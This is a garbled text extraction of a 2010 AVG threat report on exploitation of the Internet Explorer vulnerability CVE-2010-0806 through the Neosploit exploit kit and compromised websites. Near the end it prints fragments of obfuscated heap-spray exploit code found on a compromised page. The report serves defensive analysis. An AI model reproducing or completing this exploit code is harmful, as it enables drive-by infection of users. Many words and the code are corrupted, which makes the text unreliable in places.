avg web intelligence
TRANSCRIPT
-
8/9/2019 AVG Web Intelligence
1/9
AVG
WEB INTELLIGENCE REPORT
APRIL 2010
THE EPIDEMIC OF CVE-2010-0806 FOLLOWING A PUBLIC DISCLOSURE
-
8/9/2019 AVG Web Intelligence
2/9
IntroductionCybercriminals keep on targeting innocent online users. They refine their methods, and search for new
ways to maximize their illegal profit while minimizing their chance of detection. In this report, we will show
you how hackers managed to infect computers with their malware while taking advantage of an unpatched
Internet Explorer vulnerability (zero-day) that was disclosed to the public. We will expose the epidemic of
this zero-day vulnerability on the web and the impact it has on users browsing the web without protection.
Our research shows that a public disclosure information about an un-patched vulnerability (zero-day) leads to a swift
response by hackers. The disclosed information was embedded in an Exploit toolkit known asNeosploit and used by
several cybercriminal gangs around the globe. The exploit toolkit Neosploit is software written by hackers and sold online
to cybercriminals who use it to infect innocent web users with their malware. The toolkit includes everything the
cybercriminal needs to operate its attack the malware, the exploit code, the statistic reports etc.
How did these cybercriminals find the information about the unpatched vulnerability? What means and
methods did they use to infect users? What is the epidemic rate of this attack? What can users do to protect
their digital assets?
In this report, we will shed some light on these questions, including the cybercrime toolkits they used.
-
8/9/2019 AVG Web Intelligence
3/9
CV -2010-0806 a d P Ds sOn Marc
9thMicrosoftreleasedanadvisoryr
gard
ng a v
nerab
ty in its Internet Exp
rerpr
d
cts versions 6
and 7. According to the infor
ation provided on this advisory the v
nerabilitycould allow remote code execution
(RCE). RCE means that an attacker who successfully exploits thisvulnerabilitycouldgain the same userrights as a
logged on user. For example, if the user is logged on with administrative userrights, an attacker who successfully
exploits this vulnerability could take complete control of an infected system. An attacker could then install
programs, view, change, ordelete data, orcreate new accounts with full userrights.
Following the Microsoft advisory, CVE-2010-0806 was published to alert the public about the existence of suchvulnerability.
Typically, public vulnerability disclosures trigger security researchers to rush in and find out what is under the
hood. The race to find where exactly the vulnerabilitystands and how to exploit it was the obvious nextstep. The
race ended with a report from a security researcher who managed to find a site exploiting this vulnerability
already and used it for creating a public Proof-of-Concept (PoC) and module for the popular open source
penetration testingplatform, Metasploit.
The debate as to whethersuch publicdisclosure isvaluable to the securitycommunity or not hasbeen around for
years. Some claim it helps the community to provide immediate protection against threats while others claim it
helpscybercriminals to trigger their attacks. We believe a responsible disclosure in the security community is a
better way to go.
-
8/9/2019 AVG Web Intelligence
4/9
T pd t V a ty as D t t d y AVGNot long after the PoC waspublished on the web, AVG spotted a majorspike in compromised websitesserving the
exploitcode targeting the zero-dayvulnerability. We concluded in ourresearch that the exploit isbeingservedby
an Exploit toolkitdubbed Neosploit. Neosploit hasbeen known forsome time already, however itsprice on the
black marketstarted to decline because of the relatively oldvulnerabilities it tries to exploit. It appears that the
people behind Neosploitadded this new exploit to its arsenal to increase its marketpriceagain.
Number of exploitserving websites following the publicdisclosure
2
5002
10002
15002
20002
25002
30002
1 2 3 4 5 6 7 8
Days from MS Advisory
NumberofHits
-
8/9/2019 AVG Web Intelligence
5/9
Example of Compromised Website Serving the Exploit
Many users believe they can tell if a website is a legitimate one or a malicious one just by visiting it.
There are two false assumptions by this statement:
1. Today s malicious code is invisible to users. Usually it s a code embeddedon the webpage that executes behindthe scene while the user just visits the web page. This is known as a drive-by
download.2. Hackers are compromising legitimate websites and insert their malicious code into them. The reason is simple:
users are visiting legitimate sites more often than other sites.
Below is an example of a compromised website we spotted that automatically attempts to infect the user with an exploit.
an you tell if this site is legitimate or one that serves malicious code? Probably not.
-
8/9/2019 AVG Web Intelligence
6/9
Here is the code behind this web page .
As you can see at the bottom of the page, the hacker who compromised this website inserted a code that tries to infect the
user this was probably not part of the original code the website owner wanted to have.
For security researchers the highlighted code is very common, but for the average web developer it will look suspiciousor
unknown.
In order to minimize detection of the exploit code by security products, the hackers tried to hide their actions. The served
exploit code in this example was obfuscated. The main reason for obfuscating the code is to avoid detection of it by
traditional signature matching techniques used by security products.
<
m >< e >
(!se
.se
. v g
["
E " + " b e "]()) ! e = ! esc pe;
s =
ew
F ! c
( ! e('%76%61%72%20%62%74%6E%20%3D%20%64%6F%63%75%6D%65%6E%74[RE " OVED]%2E%63%72%65%61%74%65%45%6 # %65%6D%65%6E%6F
%6E%22%29%3B%20%62%74%6E%2Ess = ew F ! c
('v c = ! e("% ! 9090%[--RE " OVED--]% ! 0000"); v y = ew A y(); v s = 0x86000- (c. e g
* 2);
v
b =!
e("%!
0c0c%!
0c0#
"); w
e (b.e
g